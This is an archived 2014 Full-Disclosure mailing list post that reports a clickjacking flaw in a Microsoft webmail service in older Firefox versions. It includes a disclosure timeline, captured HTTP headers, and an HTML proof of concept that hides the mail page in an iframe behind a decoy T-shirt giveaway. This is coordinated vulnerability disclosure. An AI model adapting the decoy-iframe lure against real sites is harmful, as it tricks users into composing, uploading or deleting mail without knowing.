lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 25 Apr 2014 18:11:03 +0530
From: Sandeep Kamble <>
To: full-disclosure <>,
Subject: [FD] UI redress attack on (affected all pages)

On 7/29/13 I've reported XFO vulnerability to the *Microsoft
Security team* and finally their investigation came to conclusion and fixed
the bug. So, Here is details of bug and timeline of fixing bug. A year ago
on the weekend, I started digging into MS services for bugs.

The timeline of investigation of the bug : July 29, 2013 - April 16 , 2014.

[image: Name: msresponse.jpg Views: 202 Size: 23.1 KB]

The interesting part of the vulnerability all pages were protected for * UI
Addressing Attack * and while doing testing, normally I test application on
the all browsers. The weird part comes here, I was able to iframe the all
the pages of including pre-authentication and post-authentication
pages on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and on
other browser all pages functionality of XFO was working perfectly.

Random announcement , nothing do with this post : Check out recorded video
of Garage4Hackers Ranchoddas Webcast Series - Browser Crash Analysis By
David Rude II aka Bannedit <>
Note : Have look the same vulnerability on Facebook Application Installing

Obviously , you must be thinking why this thing is happening with Mozilla.
After doing some research and consulting with *G4H team* , I've concluded,
it may be issue with *Gecko Engine*. The test environment was win 7 ,
ubuntu 10,11,12.
Note : If you stumbled upon on the same issue of Gecko, then please do
reply on this thread.

Check out the following headers , XFO header is missing on Gecko/20120306
Firefox/3.6.28 to MF 6.


        GET /m/?bfv=wm HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US;
rv: Gecko/20120306 Firefox/3.6.28
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 115
        Connection: keep-alive

        HTTP/1.1 200 OK
        Content-Type: text/html; charset=utf-8
        Content-Encoding: gzip
        Vary: Accept-Encoding
        Server: Microsoft-IIS/7.5
        X-Wlp-StartTime: 29-07-2013 10:10:32 AM
        xxn: 22
        MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
        X-Powered-By: ASP.NET
        Content-Length: 3113
        Date: Mon, 29 Jul 2013 10:10:32 GMT
        Connection: keep-alive
        Set-Cookie: bfv=wm;; path=/
        Set-Cookie: widecontext=X; path=/; secure
        Set-Cookie:; path=/
        Set-Cookie: xidseq=7;; path=/
        Set-Cookie: LD=;; expires=Mon, 29-Jul-2013
08:30:32 GMT; path=/
        Cache-Control: no-cache, no-store, must-revalidate, no-transform
        Pragma: no-cache
        Expires: -1, -1

Here is some print screen of basic operations of (I would like to
remind you , every page of was vulnerable )

Attacker developed this page to attack on victim.

*Composing Email : *

*Uploading Attachment : *

*Deleting Emails : *


HTML POC , which i used sent to MS Security Team


<!-- This Quick Developed POC , for testing purpose --!>
<!-- Visit  --!>
	<title> Live Mail Send Clickjacking - </title>
		iframe {
		  top:0; left:0;
		  filter:alpha(opacity=50); /* in real life opacity=0 */
<div><center>Bhag Milkha Bhag Competition</center></div>
<center><b>Click Connect, You will Bhag Muilkha Bhag T-shirts. </b></center>

    <iframe src=""></iframe>
	<a href="" target="_blank" style="position:
relative; left: 0px; top: 220px; z-index: -1;">Connect</a>


- [S]

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists